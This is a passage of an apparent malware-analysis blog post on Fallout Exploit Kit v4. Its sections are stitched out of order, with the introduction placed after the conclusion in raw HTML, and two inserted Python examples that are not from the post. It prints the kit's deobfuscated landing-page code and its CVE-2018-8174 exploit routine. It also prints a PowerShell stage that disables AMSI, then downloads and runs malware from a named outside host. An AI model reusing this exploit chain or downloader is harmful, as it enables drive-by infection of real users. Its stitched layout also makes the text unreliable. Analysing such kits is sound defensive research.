        var lI1lIl1Ill = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](l1ll1);
        // aes_decrypt(enc_data, key, iv)
        var Il11lII1 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l'](
            l1I1l1['lIlIl1IIl11'], // enc_data
            II1ll, // str_G
            { lI1lIl1Ill: lI1lIl1Ill } // iv =&gt; str_A
        );

    The value generated from str_F, str_C and str_D is called str_G. So str_C is required to decrypt the data, but str_C has never been sent to the server. Looking at the traffic data, you can see str_E and str_G, which are derived from str_C, but it is impossible to find str_C. For details, see Diffie–Hellman key exchange on Wikipedia.

    The data decrypted this way is executed as JavaScript.

        // eval
        II1Il['ll1I1']();

    Let’s look at the executed code. First, the URL used next is decrypted. The key and IV used here are the hard-coded initial values.

        // aes_decrypt(enc_url, key, iv)
        var l11l1I1 =window["Il1IIllIlI1I"]["lI11lIl"]["l11II11l"](
            "l9kie2x7t4Iq4hRNA3G3Juz+buSrv9OSyATsAvZRjsoWkjatAa3Am6oRnar5jjv2N8XFpvDYQbKswFbyKiGPXM/eRwj5+hz4hg+dTKr5BLk=",
            III1l1,
            { lI1lIl1Ill:II1ll11I }
        )["lIlIlll11l"](window["Il1IIllIlI1I"]["IIIlI"]["Il11I1II"]);

    Then, as before, a function is called. Let’s look at it. First, it defines the values needed for encryption and decryption, as before; we give each one a name as before.
        // str_A2
        var l1ll1 = window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l']();
        // str_B2
        var lIlII11 = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16);
        // str_C2
        var ll1l1IlIIIll = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16);
        // str_D2
        var lll1II = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16);
        // str_E2 =&gt; str_B2.modPow(str_C2, str_D2)
        var l11IlIl = lIlII11['ll11IIl'](ll1l1IlIIIll,lll1II);

    Next, it prepares the data to send as a POST request. Unlike before, the Adobe Flash Player version is also sent.

        var l11IlIIlllll = {};
        l11IlIIlllll['lIlII11'] = lIlII11['lIlIlll11l'](16); // str_B2
        l11IlIIlllll['lll1II'] = lll1II['lIlIlll11l'](16); // str_D2
        l11IlIIlllll['l11IlIl'] = l11IlIl['lIlIlll11l'](16); // str_E2
        l11IlIIlllll['lI1lIl1Ill'] = l1ll1; // str_A2
        l11IlIIlllll['II1l1IlI'] = '@@'['II1l1IlI'](); // browser check data
        l11IlIIlllll['l1l111I'] = window['l1l111I']; // Adobe Flash Player version check data

    The sending process is the same as before. The key and IV used here are again the initial values.

        window['I1l1I1'](Il1I11l,"post",l11l1I1,true);
        window['l1lllIIlI'](
            Il1I11l,
            // aes_encrypt
            window['Il1IIllIlI1I']['lI11lIl']['Ill1lI1Ill'](
                window['IIII1Il'](l11IlIIlllll), // POST Data
                window['III1l1'], // key
                {lI1lIl1Ill:window['II1ll11I']} // iv
            )['lIlIlll11l']()
        );

    Then onreadystatechange is called again, and the same decryption steps run as before. First, the POST response is decrypted with the same key and IV as before.
        // aes_decrypt(enc_data, key, iv)
        var lIlIl1IIl11 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l'](
            Il1I11l['responseText'], // enc_data
            window['III1l1'], // key
            {lI1lIl1Ill:window['II1ll11I']} // iv
        )['lIlIlll11l'](window['Il1IIllIlI1I']['IIIlI']['Il11I1II']);

    Parsing the decrypted result as JSON gives three values, like this. The first, a 32-character hexadecimal string, is called str_F2.

        {
            "lIlll1IIlI": "87e087b48d4b06215f486021f23f5470",
            "lIIIIllIl1": "oUeRtTwLk9lLYqMwZC3AM49H8HDw15IqymZ0W\/vw87Vd9RtdXhps9ZppZc\/INO01Bqk79BOMS9ykHCDPE\/\/kWCHQuuh0\/rr…",
            "II11lIl11": "88HY4nkc9TWmnRPi\/hEPmk8ZCTJ5tIwItosOTmqFjUBFxCXfoXdMKas+TeKLUbdwsXAhvGa35wNmMnajdPzt1huWerzwnhoGcFP…"
        }

    The other two values are decrypted, giving two pieces of data.

        var lIlll1IIlI = window['l1l1IIlIlI'](l1I1l1['lIlll1IIlI'],16);
        // str_G2 =&gt; str_F2.modPow(str_C2, str_D2)
        var llIIlI = lIlll1IIlI['ll11IIl'](ll1l1IlIIIll,lll1II);
        var I1Il1I1 = llIIlI['lIlIlll11l'](16);
        var IIIIlI1IllII = 32 - I1Il1I1.length;
        while(IIIIlI1IllII &gt; 0) {
            I1Il1I1 = '0'+I1Il1I1;
            IIIIlI1IllII--;
        }
        var II1ll = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](I1Il1I1); // str_G2
        var lI1lIl1Ill = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](l1ll1); // str_A2
        // aes_decrypt()
        var I1II111I1 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l'](
            l1I1l1['lIIIIllIl1'], // enc_data_1
            II1ll, // str_G2
            {lI1lIl1Ill: lI1lIl1Ill} // str_A2
        );
        var IIIIl = window['Il1IIllIlI1I']['lI11lIl']['l11II11l'](
            l1I1l1['II11lIl11'], // enc_data_2
            II1ll, // str_G2
            {lI1lIl1Ill: lI1lIl1Ill} // str_A2
        );

    The decrypted data is written into the body and executed. It consists of the CVE-2018-8174 exploit code and the CVE-2018-15982 exploit code that loads the swf loader.
        if(IlIII1lll['length'] !== 0) {
            var IIlIl = window['document']['createElement']("iframe");
            IIlIl['setAttribute']("id", "IlIlll1I1");
            window['document']['getElementsByTagName']("BODY")[0].appendChild(IIlIl);
            var I11I11IIlIII = window['document']['getElementById']("IlIlll1I1")['contentWindow']['document'];
            I11I11IIlIII['open']();
            I11I11IIlIII['write'](IlIII1lll);
            I11I11IIlIII['close']();
        }
        if(lIl1l1I['length'] !== 0) {
            var l1III11 = window['document']['createElement']("iframe");
            l1III11['setAttribute']("id", "lII1I1IlI1I");
            window['document']['getElementsByTagName']("BODY")[0].appendChild(l1III11);
            var llIll1lI = window['document']['getElementById']("lII1I1IlI1I")['contentWindow']['document'];
            llIll1lI['open']();
            llIll1lI['write'](lIl1l1I);
            llIll1lI['close']();
        }

    For the swf loader, the following code is executed.

        &lt;html&gt;
        &lt;head&gt;
        &lt;meta http-equiv="x-ua-compatible" content="IE=10"&gt;
        &lt;/head&gt;
        &lt;body&gt;
        &lt;div id="BnjJbx"&gt;&lt;object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="205" height="528" id="BnjJbx" align="middle"&gt;
        &lt;param name="movie" value="/24_02_1964/05_04_1933/3410-Skegger-12666" /&gt;
        &lt;param name="quality" value="high" /&gt;
        &lt;param name="bgcolor" value="#ffffff" /&gt;
        &lt;param name="play" value="true" /&gt;
        &lt;param name="loop" value="true" /&gt;
        &lt;param name="wmode" value="window" /&gt;
        &lt;param name="scale" value="showall" /&gt;
        &lt;param name="menu" value="false" /&gt;
        &lt;param name="devicefont" value="false" /&gt;
        &lt;param name="salign" value="" /&gt;
        &lt;param name="allowScriptAccess" value="sameDomain" /&gt;&lt;/object&gt;&lt;/div&gt;
        &lt;/body&gt;
        &lt;/html&gt;

    Thus the swf file that exploits CVE-2018-15982 is loaded and executed.

    CVE-2018-8174

    The exploit code used is very similar to the PoC.
        Sub StartExploit
            UAF
            InitObjects
            vb_adrr=LeakVBAddr()
            vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
            msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
            krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
            ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
            VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
            NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
            SetMemValue GetShellcode()
            ShellcodeAddr=GetMemValue()+8
            SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
            lIlll=GetMemValue()+69596
            SetMemValue ExpandWithVirtualProtect(lIlll)
            llIIll=GetMemValue()
            ExecuteShellcode
        End Sub
        StartExploit

    The shellcode is generated like this (the multi-kilobyte %u-escaped shellcode string inside the second Unescape call is omitted here).

        Function GetShellcode()
            IIlI=Unescape("%u0000%u0000%u0000%u0000") &amp;Unescape("..." &amp;lIIII(IIIII("")))
            IIlI=IIlI &amp; String((&amp;h80000-LenB(IIlI))/2,Unescape("%u4141"))
            GetShellcode=IIlI
        End Function

    Let’s read the shellcode.

    Shellcode

    The decoding algorithm in the shellcode has not changed from v3 and remains RC4 (see Analysis of Fallout Exploit Kit v3). The API hashing algorithm has not changed either: APIs are hashed with the dualaccModFFF1Hash algorithm.
        unsigned int __thiscall dualaccModFFF1Hash(unsigned __int8 *this)
        {
          unsigned __int8 *v1; // ebx
          int v2; // edi
          unsigned int v3; // esi
          int i; // ecx
          unsigned int v5; // edx

          v1 = this;
          v2 = 1;
          v3 = 0;
          for ( i = zz_count(this); i; --i )
          {
            v5 = (v2 + (unsigned int)*v1++) % 0xFFF1;
            v2 = v5;
            v3 = (v3 + v5) % 0xFFF1;
          }
          return v2 + (v3 &lt;&lt; 16);
        }

    However, there are interesting changes: analysis-environment detection code has been added to the shellcode.

    VM Detection

    It queries hypervisor presence using CPUID.

        unsigned int __thiscall zz_vm_detect(unsigned int *this)
        {
          unsigned int *v1; // edi
          unsigned int result; // eax

          v1 = this;
          _EAX = 1;
          __asm { cpuid }
          result = _ECX &gt;&gt; 31;
          *v1 = _ECX &gt;&gt; 31;
          return result;
        }

    Process Detection

    It gets a list of running processes and converts each process name to lower case.

        int __cdecl zz_tolowercase(_BYTE *a1)
        {
          int result; // eax

          while ( 1 )
          {
            result = (char)*a1;
            if ( !*a1 )
              break;
            if ( (char)*a1 &gt;= 65 &amp;&amp; (char)*a1 &lt;= 90 )
              *a1 += 32;
            ++a1;
          }
          return result;
        }

    The names are then compared against the following hashes. Once again, it uses the dualaccModFFF1Hash algorithm.

        0x3F5406DE
        0x25CD0541
        0x0F050309
        0x161803EC
        0x19F3044B

    Two process names were identified. I do not know the others.

        &gt;&gt;&gt; hex(dualaccModFFF1Hash("wireshark.exe"))
        '0x25cd0541'
        &gt;&gt;&gt; hex(dualaccModFFF1Hash("fiddler.exe"))
        '0x19f3044b'

    Like v3, the shellcode downloads, decodes and executes encrypted PowerShell code.

    PowerShell

    The PowerShell code to be executed is like this.

        powershell.exe -w hidden -noni -enc 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

    Let’s decode and clean it.
        try {
            $l1Il1 = [Ref].Assembly;
            $l1Il1lI1IIl = $l1Il1.GetType("System.Management.Automation.AmsiUtils");
            $I1Il11l1Il = $l1Il1lI1IIl.GetField("amsiInitFailed", 'NonPublic,Static');
            $I1Il11l1Il.SetValue($null, $true);
        } catch { };
        Add-Type -TypeDefinition "using System;using System.Diagnostics;using System.Runtime.InteropServices;[StructLayout(LayoutKind.Sequential)]public struct I1lII1Il1{public IntPtr IIlI1;public IntPtr lIl1I1II1l;public uint IIIIIlII;public uint Il111lIl1I1I;}[StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]public struct lI1ll1Il1I1l{public uint IIIlI;public string Il1l1;public string lI1ll;public string Il111IIIl;public uint I1lIl1ll1I;public uint IlIIIl1;public uint ll11Ill;public uint Il1IlIl1;public uint lIlIII;public uint lI1lIlI;public uint lI1l11;public uint Ill1Il;public short IlII1;public short IllIll;public IntPtr llIlIlIlI;public IntPtr Ill1IlIlI;public IntPtr IllIlllI1I1;public IntPtr I1III;};public static class l1Il11III{[DllImport(""kernel32.dll"",SetLastError=true)]public static extern bool CreateProcess(string IIlIII,string IlIlI,IntPtr I11l1I,IntPtr l1lI1,bool IlI11II1111,uint l111I,IntPtr lIII1IllI,string I1Il1lI,ref lI1ll1Il1I1l ll11IIl1I,out I1lII1Il1 lII1II);}";
        $lll1IllI1 = "$env:userprofile\AppData\LocalLow\$(-join((48..57)+(65..90)+(97..122)|Get-Random -Count 8|%{[char]$_})).tmp";
        $I1l11I1 = 'http://beahero4u.com/1950-01-11/O8Zr';
        $cli = (New-Object Net.WebClient);
        $cli.Headers['User-Agent'] = 'J57P9y1i30M102X5';
        $cli.DownloadFile($I1l11I1, $lll1IllI1);
        $I1I1l1IIllI1 = New-Object lI1ll1Il1I1l;
        $I1I1l1IIllI1.IlII1 = 0x0;
        $I1I1l1IIllI1.IIIlI = [System.Runtime.InteropServices.Marshal]::SizeOf($I1I1l1IIllI1);
        $IIl1Il1I = New-Object I1lII1Il1;
        [l1Il11III]::CreateProcess($lll1IllI1, $lll1IllI1, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0x00000008, [IntPtr]::Zero, "c:", [ref]$I1I1l1IIllI1, [ref]$IIl1Il1I) | out-null;

    Thus the malware is downloaded and executed.
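The dualaccModFFF1Hash routine from the Shellcode section above, ported to Python as an added example (not code from the post): it shows that the routine is Adler-32 and runs the shellcode's lower-case-then-hash check over a constructed list of common analysis-tool process names, so the hash table can be resolved without running the shellcode.

```python
import zlib

# The five hashes the v4 shellcode compares lower-cased process names against (from the post).
SHELLCODE_PROCESS_HASHES = {0x3F5406DE, 0x25CD0541, 0x0F050309, 0x161803EC, 0x19F3044B}


def dualacc_mod_fff1_hash(data: bytes) -> int:
    """Python port of the decompiled dualaccModFFF1Hash: two accumulators mod 0xFFF1,
    the running byte sum (seeded with 1) in the low half, the sum of sums in the high half."""
    v2, v3 = 1, 0
    for byte in data:
        v2 = (v2 + byte) % 0xFFF1
        v3 = (v3 + v2) % 0xFFF1
    return v2 + (v3 << 16)


def zz_tolowercase(name: str) -> bytes:
    """Port of the shellcode's zz_tolowercase: only ASCII 'A'..'Z' are shifted by 32."""
    return bytes(b + 32 if 65 <= b <= 90 else b for b in name.encode("ascii"))


def is_adler32(data: bytes) -> bool:
    """Accumulators seeded 1 and 0, reduced mod 65521 (0xFFF1), second one in the high 16 bits:
    that is exactly Adler-32, so zlib computes the same value as the shellcode routine."""
    return dualacc_mod_fff1_hash(data) == zlib.adler32(data)


def resolve_process_hashes(candidates):
    """Hash each candidate the way the shellcode would and return ({hash: name}, unresolved)."""
    resolved = {}
    for cand in candidates:
        lowered = zz_tolowercase(cand)
        h = dualacc_mod_fff1_hash(lowered)
        if h in SHELLCODE_PROCESS_HASHES:
            resolved[h] = lowered.decode("ascii")
    unresolved = SHELLCODE_PROCESS_HASHES - set(resolved)
    return resolved, unresolved


# Constructed candidate list: the two names the post identifies plus other well-known
# analysis-tool process names (constructed for this example, not taken from the kit).
CANDIDATES = ["Wireshark.exe", "Fiddler.exe", "procmon.exe", "procexp.exe",
              "ollydbg.exe", "windbg.exe", "ida64.exe", "processhacker.exe"]

if __name__ == "__main__":
    found, missing = resolve_process_hashes(CANDIDATES)
    for h, name in sorted(found.items()):
        print(f"{h:#010x}  {name}")
    print("unresolved:", [f"{h:#010x}" for h in sorted(missing)])
```

With this candidate list every one of the five hashes resolves to a well-known analysis tool, which is why analysts commonly run such tools under renamed executables.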
    Conclusion

    Fallout has been heavily updated, making analysis very difficult. Sophisticated techniques such as Diffie-Hellman key exchange, VM detection and process detection are used. We need to stay careful, as it may be updated again in the future.
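The key exchange described in the Landing Page section above, simulated end to end as an added example (not the kit's code). Names follow the post (str_A to str_G and the JSON field names of the first sample); how the server picks its secret and forms str_F is an assumption, since the post only shows the client side, and the AES-CBC layer keyed with str_G and str_A is not reproduced, only the key derivation.

```python
import secrets

# str_A: AES IV, str_B: base, str_C: client secret (never sent), str_D: modulus,
# str_E: client public value, str_F: server public value, str_G: derived AES key.
# As on the page, str_B, str_C and str_D are plain random 128-bit values; str_D is not a
# vetted prime, so this mirrors the kit rather than a standard Diffie-Hellman group.


def rand_hex32() -> str:
    """CryptoJS lib.WordArray.random(16).toString(): 16 random bytes as 32 hex digits."""
    return secrets.token_hex(16)


def pad32(hex_digits: str) -> str:
    """The kit's while loop: left-pad the derived key to 32 hex digits (16 key bytes)."""
    return hex_digits.rjust(32, "0")


def client_request():
    """Build the POST body as the landing-page JavaScript does.
    Returns (body, str_C): body goes on the wire, str_C stays inside the browser."""
    str_A = rand_hex32()
    str_B, str_C, str_D = (int(rand_hex32(), 16) for _ in range(3))
    str_E = pow(str_B, str_C, str_D)               # str_B.modPow(str_C, str_D)
    body = {
        "lIlII11": format(str_B, "x"),             # str_B
        "lll1II": format(str_D, "x"),              # str_D
        "l11IlIl": format(str_E, "x"),             # str_E
        "lI1lIl1Ill": str_A,                       # str_A, later the AES IV
        "II1l1IlI": "false@@false@@true@@false",   # browser check data (constructed)
    }
    return body, str_C


def server_response(body):
    """Assumed server side: pick a secret s, publish str_F = str_B^s mod str_D and derive
    the same key from the client's str_E. Returns (response, server_key)."""
    str_B = int(body["lIlII11"], 16)
    str_D = int(body["lll1II"], 16)
    str_E = int(body["l11IlIl"], 16)
    s = int(rand_hex32(), 16)
    str_F = pow(str_B, s, str_D)
    server_key = pad32(format(pow(str_E, s, str_D), "x"))     # equals str_G
    return {"IlI1l": format(str_F, "x")}, server_key


def client_key(body, response, str_C):
    """The onreadystatechange side: str_G = str_F.modPow(str_C, str_D), padded to 32 digits.
    This is also what an analyst needs: with str_C logged from the live browser session
    and the captured body/response, the key for the inner AES layer is recoverable."""
    str_F = int(response["IlI1l"], 16)
    str_D = int(body["lll1II"], 16)
    return pad32(format(pow(str_F, str_C, str_D), "x"))


def observer_view(body, response):
    """Everything a pcap holds once the outer AES layer (fixed key/IV) is stripped:
    str_A, str_B, str_D, str_E and str_F, but never str_C."""
    return {**body, **response}


def run_exchange():
    body, str_C = client_request()
    response, server_key = server_response(body)
    return {
        "client_key": client_key(body, response, str_C),
        "server_key": server_key,
        "iv": body["lI1lIl1Ill"],
        "capture": observer_view(body, response),
    }
```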
    <h2 id="first">First</h2> <p>We have been observing the Fallout Exploit Kit since August 2018. Fallout uses non-characteristic URLs and a heavily obfuscated landing page. It still has users, and attacks are observed daily. Recently, we were investigating an attack campaign that infects Raccoon Stealer in the flow of PopAds-&gt; KeitaroTDS-&gt; Fallout.</p> <p>About Fallout, we have already written three reports. The first one was about the emergence of Fallout, the second one about its adoption of PowerShell and the third one about its use of a PoC from GitHub. We divide these major changes by version and call them v1~3.</p> <ul> <li><a href="https://nao-sec.org/2018/09/hello-fallout-exploit-kit.html">Hello “Fallout Exploit Kit”</a></li> <li><a href="https://nao-sec.org/2019/01/in-depth-analysis-of-new-fallout.html">In-Depth analysis of new Fallout Exploit Kit</a></li> <li><a href="https://nao-sec.org/2019/03/analysis-of-fallout-exploit-kit-v3.html">Analysis of Fallout Exploit Kit v3</a></li> </ul> <p>We wrote about v3 in March 2019. v3 was not stable and was updated to the next version immediately. 
@EKFiddle (created and maintained by @jeromesegura) reported this change on April 11.</p> <blockquote class="twitter-tweet" data-lang="ja"><p lang="en" dir="ltr"><a href="https://twitter.com/hashtag/EKFiddle?src=hash&amp;ref_src=twsrc%5Etfw">#EKFiddle</a> [Regex update]: <a href="https://twitter.com/hashtag/FalloutEK?src=hash&amp;ref_src=twsrc%5Etfw">#FalloutEK</a><br />Seems like there is no more use of the PoC on GitHub for CVE-2018-8174.<br />Pushing <a href="https://twitter.com/hashtag/GandCrab?src=hash&amp;ref_src=twsrc%5Etfw">#GandCrab</a> in this particular instance.<a href="https://t.co/U67qZosp1e">https://t.co/U67qZosp1e</a> <a href="https://t.co/buVTakYuhJ">pic.twitter.com/buVTakYuhJ</a></p>&mdash; EKFiddle (@EKFiddle) <a href="https://twitter.com/EKFiddle/status/1116134534989238272?ref_src=twsrc%5Etfw">April 11, 2019</a></blockquote> <script async="" src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> <p>We call this big update v4 (it is still v4). No detailed analysis report has been written about what this update changed. However, the update is very big; at least for us (exploit kit analysts) it made analysis very cumbersome. Fallout v4 incorporates the following features.</p> <div class="language-md highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">1.</span> Diffie-Hellman key exchange
<span class="p">2.</span> VM detection
<span class="p">3.</span> Process detection
</code></pre></div></div> <p>Here, we will share detailed analysis results on the updates made in Fallout v4. Unfortunately, we did not understand everything. If you know more, please help us.</p> <h2 id="traffic-chain">Traffic chain</h2> <p>First, let’s look at the previous traffic chain. 
v1 to v3 looked like this.</p> <p><img src="https://4.bp.blogspot.com/-eXpYD_rUFwU/W4loVPM1TTI/AAAAAAAAAVI/XuE3p36q7QMAVw95gBYPkKOA-IhsdaoAQCLcBGAs/s1600/0.png" alt="" /> <img src="https://3.bp.blogspot.com/-_qnvJOfIOeE/XEiKt9Zs16I/AAAAAAAAAYI/tspkgYcwxe0YjeGhaTGofsUBpfmhjJzmwCLcBGAs/s1600/0.png" alt="" /> <img src="https://nao-sec.org/assets/2019-03-07/01.png" alt="" /></p> <p>In v3, it fetched the PoC for CVE-2018-8174 from GitHub and attacked by rewriting the shellcode part of it. So what does the v4 traffic chain look like?</p> <p><img src="https://nao-sec.org/assets/2019-07-09/01.png" alt="" /></p> <div class="language-md highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. Landing Page
2. JavaScript Code
3. Encoded Code 1
4. Encoded Code 2 (CVE-2018-8174 + SWF Loader)
5. CVE-2018-15982
6. PowerShell Code
7. Malware
</code></pre></div></div> <p>In this way, an attack is carried out over seven requests. Let’s look at each one in order. (In the following we use traffic data different from the above. 
The detailed reason is given later, but in short it is difficult to capture traffic and analyze it at the same time.)</p> <h2 id="landing-page--js-code--encoded-data">Landing Page + JS Code + Encoded Data</h2> <p>The landing page first loads JavaScript code.</p> <div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta http-equiv="x-ua-compatible" content="IE=10"&gt;
&lt;script type="text/javascript" src="/04_09_2003/Symposium?Peristele=02_03_1943&amp;LE3r=Aps&amp;ILZhH=Frazzling-Anorexias"&gt;&lt;/script&gt;
&lt;/head&gt;
</code></pre></div></div> <p>Note the <code class="language-plaintext highlighter-rouge">x-ua-compatible</code> meta tag, which forces Internet Explorer into the IE10 document mode: VBScript, which the later CVE-2018-8174 stage depends on, is disabled by default in the IE11 document mode, so the kit pins an older one. The script itself contains obfuscated copies of CryptoJS and BigInteger. 
Excluding the large library parts, there is very little processing.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// key (32 hex characters parsed into 16 bytes)
window.III1l1 = window["Il1IIllIlI1I"]["IIIlI"]["II1I1lI1I"]["ll1llI1"]("8b69cbdfc5fe43e69b7920c8ee721fc9");
// iv (same hex parser)
window.II1ll11I = window["Il1IIllIlI1I"]["IIIlI"]["II1I1lI1I"]["ll1llI1"]("301ae8205ddcd5897df69e3b0c056c34");
// aes_decrypt(enc_data, key, iv), then decoded as a UTF-8 string
window.l11llIll = window["Il1IIllIlI1I"]["lI11lIl"]["l11II11l"](
    "p4N9IqH/oiAKHkDCR0zXXfrvhwVrVPsFZSNUjkVFXxxBofjpd5JLM1sdAega3oRy",
    III1l1,
    { lI1lIl1Ill: II1ll11I }
)["lIlIlll11l"](window["Il1IIllIlI1I"]["IIIlI"]["Il11I1II"]);
</code></pre></div></div> <p>First, two values (<code class="language-plaintext highlighter-rouge">8b69cbdfc5fe43e69b7920c8ee721fc9</code> and <code class="language-plaintext highlighter-rouge">301ae8205ddcd5897df69e3b0c056c34</code>) appear. These are the key and IV for AES. Decrypting the following Base64 string with this key and IV yields the data needed for the next step (specifically, the URL from which the encoded data used next is fetched). Decrypted, it looks like this.</p> <p><img src="https://nao-sec.org/assets/2019-07-09/02.png" alt="" /></p> <p>Next comes a check of which browser is in use. 
Depending on it, Opera, Firefox, IE or Chrome is detected.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// check browser: four booleans joined with the string the method is called on
window["String"]["prototype"]["II1l1IlI"] = function () {
    return (!!window["opr"] &amp;&amp; !!window["opr"]["addons"] || !!window["opera"] || navigator["userAgent"]["indexOf"](" OPR/") &gt;= 0)  // Opera
        + this
        + (typeof window["InstallTrigger"] !== "undefined")          // Firefox
        + this
        + (false || !!window["document"]["documentMode"])            // IE
        + this
        + (!!window["chrome"] &amp;&amp; !!window["chrome"]["runtime"])  // Chrome
};
</code></pre></div></div> <p>Then there is a process to check the version of Adobe Flash Player. 
This value is used later.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(function () {
    window.l1l111I = '';
    try {
        // ActiveXObject exists only in IE; elsewhere this throws and the value stays empty
        window.l1l111I = new ActiveXObject('ShockwaveFlash.ShockwaveFlash').getVariable('$version')
    } catch (e) {}
})();
</code></pre></div></div> <p>The process then returns to the landing page. In the landing page, one function is defined and executed. 
Let’s look at that function.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// str_A: 32 random hex characters, kept as a string
var l1ll1 = window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l']();
// str_B: 32 random hex characters, wrapped as a BigInteger (base 16)
var lIlII11 = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16);
// str_C
var ll1l1IlIIIll = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16);
// str_D
var lll1II = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16);
// str_E =&gt; str_B.modPow(str_C, str_D)
var l11IlIl = lIlII11['ll11IIl'](ll1l1IlIIIll, lll1II);
</code></pre></div></div> <p>Here, expressions such as <code class="language-plaintext highlighter-rouge">window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l']()</code> appear repeatedly. This is defined in CryptoJS and generates a 32-character random hexadecimal string. After generating four random values, the second, third and fourth are used to generate a fifth one with modPow. The five values prepared here are used in the cryptographic processing that follows. We call them str_A, str_B, str_C, str_D and str_E.</p> <p>The code that follows is divided into three parts: the <code class="language-plaintext highlighter-rouge">onreadystatechange</code> handler that runs after the request has been sent to the server, the process that generates the data to send, and the process that sends it. These are standard XMLHttpRequest POST procedures. 
First, let’s look at the process of generating the data to send.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var l11IlIIlllll = {};
l11IlIIlllll['lIlII11'] = lIlII11['lIlIlll11l'](16);   // str_B
l11IlIIlllll['lll1II'] = lll1II['lIlIlll11l'](16);     // str_D
l11IlIIlllll['l11IlIl'] = l11IlIl['lIlIlll11l'](16);   // str_E
l11IlIIlllll['lI1lIl1Ill'] = l1ll1;                    // str_A
// browser check data
l11IlIIlllll['II1l1IlI'] = '@@'['II1l1IlI']();
</code></pre></div></div> <p>Five values have been added to the object <code class="language-plaintext highlighter-rouge">l11IlIIlllll</code>. All but the last are the random values created earlier: of the five random values, every one except str_C is included in the data to send. The last is the browser check data generated earlier; it records whether the browser is Opera, Firefox, IE or Chrome as true/false values joined with <code class="language-plaintext highlighter-rouge">@@</code>. This is the data prepared for sending. Note that str_C is not sent to the server.</p> <p>Next, let’s look at the sending process.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>window['I1l1I1'](Il1I11l, "post", l11llIll, true);
/* -- snip -- */
// Send POST
window['l1lllIIlI'](
    Il1I11l,
    // aes_encrypt(data, key, iv)
    window['Il1IIllIlI1I']['lI11lIl']['Ill1lI1Ill'](
        window['IIII1Il'](l11IlIIlllll),     // post request data (serialized as JSON)
        window['III1l1'],                    // key
        { lI1lIl1Ill: window['II1ll11I'] }   // iv
    )['lIlIlll11l']()
);
</code></pre></div></div> <p>This is also an ordinary request-sending process. The URL is the string decrypted with AES earlier. The data sent is the data prepared above, encrypted with AES. The key and IV are the same ones used to decrypt the URL. 
The data before encryption looks like this.</p> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
    "lIlII11": "c81e728d9d4c2f636f067f89cc14862c",
    "lll1II": "a87ff679a2f3e71d9181a67b7542122c",
    "l11IlIl": "3f05415ebff145466040f6a73dca8704",
    "lI1lIl1Ill": "c4ca4238a0b923820dcc509a6f75849b",
    "II1l1IlI": "false@@false@@true@@false"
}
</code></pre></div></div> <p>What is actually sent is the encrypted form.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TvU4TAyld3MNlDcMtLwxBo+uVXAbIB1jpPO1a9HDv2dZs7HonG67s8heWoMyvnUFqFBdoEhU0STYjHHQxX6DK7x7Z1naG/2TAdm+AR5l6gpYVl4jXB9oOOyfJtZrfJHabQT5Jhlqv1dtvsJ+0G27qhamqtPT16wCpXn2R2WHf8NJu9SvXSSVadW7sT6QDt32Jt0z3oR0VIlpuE/w3snfKDNIjJYhuMz/VGYIL9WNdg0hC26sxB5fJ5fOOuifh2rNk9GgNsNdfVP01Tf77GRDu9puTbgfsgYOnCz0ONOmp05B14kJ1tK8ZI6ciOWLvOYV
</code></pre></div></div> <p>Let’s look at what happens after sending. <code class="language-plaintext highlighter-rouge">onreadystatechange</code> is called, and two AES decryptions are performed there. 
Let’s first look at the first decryption.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// aes_decrypt(enc_data, key, iv)
var lIlIl1IIl11 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l'](
    Il1I11l['responseText'],             // enc_data
    window['III1l1'],                    // key
    { lI1lIl1Ill: window['II1ll11I'] }   // iv
